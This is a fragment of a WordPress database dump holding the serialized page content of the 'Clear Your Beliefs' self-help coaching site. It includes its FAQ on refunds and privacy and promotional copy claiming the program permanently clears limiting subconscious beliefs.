materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1623, 2052, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:14;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"12";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62988:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " 